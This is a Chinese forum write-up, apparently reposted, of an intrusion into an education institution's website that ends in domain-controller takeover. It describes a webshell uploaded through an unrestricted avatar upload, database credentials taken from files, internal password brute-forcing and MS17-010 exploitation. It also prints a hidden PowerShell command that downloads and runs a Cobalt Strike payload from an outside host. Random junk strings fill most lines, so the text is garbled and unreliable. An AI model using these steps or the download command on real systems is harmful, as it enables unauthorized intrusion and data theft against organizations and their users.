|
1 s3 z3 k# R/ q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路0 U5 T. z# J$ B' m! v/ R
7 M* z9 [+ G9 s) @; U& O. t" K# V) Y+ C4 r
/ Y& B% n5 g2 F) g! X, ~ . J( R0 g# P. x
4 J7 g( j3 q; _9 ?# Z( {( w
正文 K( B8 ~+ D+ ~) A
6 ?; |( H! X9 Q$ ~- P+ X! ^" h
$ R- q( f. M* i. f0 r& t
- g$ z: L, X2 `
2 K' s1 J1 v" V1 S: ?- x5 I! s
3 R; _# A( r# s4 i4 Z& ^9 p 目标:www.xxxx.com(一家教育机构)
- V, _ e* H. z# w) u9 J打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能: G4 K% M8 p v( Q' l B0 ]; m
/ [& i' O9 _3 t/ S2 i
5 u# t9 p- v) b2 L" {1 ?+ n" ~2 ]
. h A; M7 S& R# p' q- P
4 o; {3 u' L9 I) F, z* {2 v3 W2 q
进行了简单的信息搜集 # K% n. q q0 d) c1 ^
3 {' V+ C3 l/ H3 _
% l/ P4 o, s: l5 A
9 ?6 s8 P2 l% A" R5 z6 N
& [7 X+ G% L" s" i( b& g; j" [ 子域名搜集
$ ^2 i2 G1 J" b+ t* Z+ W b+ h. \
3 ]0 h: J" s& e L
9 `( k& n8 { N3 T$ e; Z
7 |% E! y( s6 A! N3 M4 @
! K) x' \$ h1 J: A4 ]/ S6 B, s% k/ m' `7 u0 q! N
fofa找资产
7 p0 T- r& S# @: l; @ ! p& H# O# \: Y# g2 A1 A& o
) @) c( u+ n; P6 M
( ]* ~( [1 |2 m( `, E. r9 }* P
$ e2 W$ L" b8 r2 V2 j) o
9 w1 E, T7 a) L( d3 j, `# v
; I: r) B: V( M4 T$ s! k' z/ z
0 f; \, n& i3 e
一共七个资产。去重之后只有两个。 : J% j3 G9 W' w, h9 T+ H
3 ^! p. a# D2 D1 O6 X- n1 w6 M
/ N$ n% u5 m" T7 I8 W" Y0 e. G) l+ @
; r; Q- I% R) F/ |8 _5 z% l& O/ d) v: O
目录探测: |- x, b" l5 [$ r( `3 e: s6 m
. A! Z" U" d3 N& p9 W% J* [" i; p% [" g! j
' Q% m C& A! W2 B, z * r; {2 y( }; p6 J# P _! `
9 l1 u5 z+ P& X% i' i 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
$ i/ d/ g: Y) o+ i . Q* y h8 ]1 o8 |0 y
+ E. \; F |3 M. b" G* o n* i
4 E2 Z, ~& } O9 G' R* ]0 [/ _
" d, g0 @% B5 c2 d8 a& j0 [* U! q
我又尝试了通过修改返回包来绕过登录界面! K! L4 C! h- n! I
# \: s" Y0 [& m% N1 G4 `1 {
1 X3 p2 D x# H$ y: W6 S$ g ; y; X+ u5 k5 [ _! R
' ?# ]: q& N* m' c1 R6 o& N& e$ G8 C; ]2 L# ~. v
还是不行,尝试注入无果2 P ^. G5 a4 E/ _2 L( M P
' V2 h- r- \1 U5 I; j% Y( e& P3 e7 Y" |7 f" h2 u/ E3 I9 t2 w. S+ l/ @
! n( U& x+ @8 K% b5 H
8 @3 S5 W$ R% y9 B1 V' @
" s+ O, i) M4 ^' o 不过我目录探测出了一处Spring信息泄露 ' F* B) r e: j7 {& d3 ~/ P
A% x4 s) \+ D
5 F$ Z- G2 j( }$ m. b
7 r1 Q2 {& p0 o& W2 { l# l m7 I0 `4 ?! p" n' V. m1 d7 {, s
, Z: L3 {) H h/ _/ o ; Q( _; V' R" L+ s, v, o7 c9 P* ~
1 ^; i( z; x: d- i 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录8 J# d+ n+ s0 z% E
$ {; H- J$ d4 X* \' c
$ C9 @2 M( N; s9 H% X
/ a: s, B" c& t" n& S
2 b4 ]6 Z( k* \9 s4 [$ Y
& [- b. U, r9 U: V q/ G 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。) H9 s7 h; B& S! ]
5 Q; g6 i- z0 d* h; j, O5 p+ G
$ P( S4 X# \, r2 A- M* H
1 x$ Z6 p; j! \9 D# O: N/ r8 `
! p$ I" M$ F8 c
获取有些师傅到这一步就手机抓包电脑测了。
2 _1 L+ F. P! @ 1 t# I1 X7 I# e, k/ X2 h, ~
I: d% ?8 _3 `: I3 \9 A2 e* a2 J7 y: k
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。/ T" s( L: p/ _. h: A
4 `4 X4 l9 b- y: k
* [: x( I/ c' w+ a9 V$ p
其中在一个公众号发现了小程序,可以进行注册。
! [% s4 [' d# ?" q 0 H0 d7 Z, Q. Q, ?# T# ~4 n
. H+ E" _ x! m+ J( S5 N 看到了头像上传,尝试上传获取WebShell5 X5 |9 A! r5 M$ e6 ]% X+ M
( Q0 V6 `8 O" {) M& ~5 ~
0 v% S' T6 |, U% o7 H/ {
: d; ]* c# q! ]. { 5 H' ?2 w- V$ C$ h2 r6 F
7 H; j( _( E* L' o
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 i% Q% h& U7 g& }
1 l$ a# ~. P& r+ o
& H& Y q4 V8 {* K8 |0 P" v ' @3 S) u4 [5 i; S: L [
/ @7 f0 l& S) P* X0 l) o+ ~ t/ M8 l. {- I
8 ` h# ^$ P- i1 r4 {7 V 然后上了大马
: U: J3 }& o: p! i, O9 X% N/ C + w6 h3 l& o( r/ e
6 I: h% V, f4 j: m u0 ]$ N p
4 I2 [& W1 N/ v4 d/ u' l
# g% v' u9 I6 m9 n) C( K0 c. t/ V' F0 W( h
9 Y) T) I. `- F& a+ ?' }
% |& R9 F( K2 ]
8 M6 W1 C, P G- I
通过翻找文件发现数据库账号密码0 M* U. [7 `* q4 T; e; r2 G
/ L! ]- S, v( N0 J$ Y
$ ?3 ~* c% e9 K5 u, C
5 f; b7 I9 [+ x3 M3 h7 B- P8 }
4 @ s8 I0 b2 {5 u. A5 _( _
3 D3 @# ^: A: s --内网渗透0 @, l/ D8 i0 ?
! K: \5 c2 |5 I( C! f0 d5 w! m* y3 s* W7 L" i, C
直接通过powershell执行 cs上线6 C" v+ ]8 X2 H2 V$ }" ? r
' K8 [5 @# B" i" P
* G& r. q5 m5 K powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% }* q' O, F0 w! R$ W
9 R4 ? g/ _5 @6 q: h
+ g- \9 O. J: f% T3 Y1 t$ } G' U
- l4 k/ Z I6 t, M2 x
6 Z, n) {" R7 A w
4 k" U* M- [7 f- S 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
) x3 X' p9 z* t5 u & i( C) Z# ~" T4 L
# E6 f+ Z6 I: h* @+ l: K
2 G0 M8 Q% q8 U3 R6 t) E
& \, u: t& ~" _- Q1 w1 N+ b$ _! B- b+ j/ H' |/ G6 _( m
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
) z( T) R8 ^4 ]
0 Y+ W v8 D H- N, K6 Y6 R
3 _1 H- T5 H5 U% p9 I2 P: ^% k% Z" W
6 J: `; \: M9 C) n8 Q1 J n4 }
! I1 v' y) S1 A: ?" E/ c2 ^0 |- j
/ P' D+ n( I( k( G
/ k4 }; r g/ Q ( K6 s8 B* c% T O2 x( r
# m# O1 @2 h+ f; G) _2 O3 {
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 ( B3 d- Z l; l E$ a" P
% o1 X1 k' s6 D2 C) }
1 u0 f+ B$ N- d$ N" [5 {
: J; I3 l; {. N( }0 K
" B* U* [( h) [& _ - ?* b/ S( g5 n2 ^
6 A+ W/ k7 B9 ]8 z1 |3 g! v9 l
1 B5 C# |. T0 R1 Z
" _" ^1 U. A& f" J( j! F' e& ]
V8 U( ~; r& ?/ j7 f' T. n. \9 w+ `( x8 z
6 X! R5 H) i8 r% E# a' T
0 x# L; q- d" M+ H
& o; n/ q$ s# _2 |; J4 z q: }
; q; b" e) @5 G0 \+ b1 f( u+ ^, Z5 {- q; k/ R1 R
小结
' h3 t- F8 K, t; F2 S* @" `
1 b' p$ d: t$ s' e" E
! K" }. O6 a6 O; F 9 C2 K L& _: `% F
( z i7 B* W, I* j( s. C8 e; p7 B7 m7 s8 M
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!/ _4 z% G- I/ O4 s. ?- Q
2 B7 ^3 M& S8 I7 g. m' h4 e
9 ]5 l, s( e8 ^. J) x+ o, k
7 a6 a! `) x3 g( ?# @
' L! V4 h' q1 q% l3 x
+ {1 d# o: f+ U% I6 B -
2 r' i. e8 ]& f. ]
) |4 i. F! ?- ?' F2 e
7 G- D. z. n# _% b4 z, B. I -
3 E& H* e! `$ ]$ z
5 d8 x2 S4 ?, K5 y7 r+ n
; m4 ]2 q( M9 N0 G
$ y) O2 L% w6 C/ c7 L
0 j5 Z/ @, d; |7 C- I: h F) P 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
# o# T3 |3 _% m; U
, c# H4 d+ v) h I! o) p/ f& n* k8 ?& ?. E
! c2 o/ H0 Z9 N; L9 R
|